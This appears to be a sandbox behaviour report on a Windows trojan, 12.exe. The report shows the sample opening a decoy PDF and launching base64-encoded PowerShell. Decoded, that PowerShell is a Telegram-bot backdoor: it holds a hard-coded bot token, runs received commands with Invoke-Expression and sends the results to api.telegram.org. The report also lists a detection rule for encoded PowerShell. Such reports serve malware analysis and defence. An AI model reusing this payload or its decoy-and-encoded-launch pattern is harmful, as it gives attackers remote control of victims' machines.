Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3F28C00_2_00007FF73A3F28C0
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40FEE80_2_00007FF73A40FEE8
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A4083400_2_00007FF73A408340
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40DBA80_2_00007FF73A40DBA8
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A409C780_2_00007FF73A409C78
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40AAE00_2_00007FF73A40AAE0
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A4027640_2_00007FF73A402764
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40000C0_2_00007FF73A40000C
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A4018940_2_00007FF73A401894
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3FF8240_2_00007FF73A3FF824
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40F84C0_2_00007FF73A40F84C
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40C6980_2_00007FF73A40C698
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E660A55_2_00007FF848E660A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E6FAEC5_2_00007FF848E6FAEC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E672085_2_00007FF848E67208
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E6FB755_2_00007FF848E6FB75
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E6D4D85_2_00007FF848E6D4D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F3418F5_2_00007FF848F3418F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F33B9E5_2_00007FF848F33B9E
Source: C:\Users\user\Desktop\12.exeProcess created: Commandline size = 9484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9439
Source: C:\Users\user\Desktop\12.exeProcess created: Commandline size = 9484Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9439Jump to behavior
Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@22/44@4/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Users\user\Desktop\12.exeFile created: C:\Users\user\AppData\Local\Temp\file.pdfJump to behavior
Source: 12.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\12.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 12.exeVirustotal: Detection: 16%
Source: 12.exeReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Users\user\Desktop\12.exe "C:\Users\user\Desktop\12.exe"
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABV
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1724,i,10193653544518332854,3055548416538146672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1724,i,10193653544518332854,3055548416538146672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
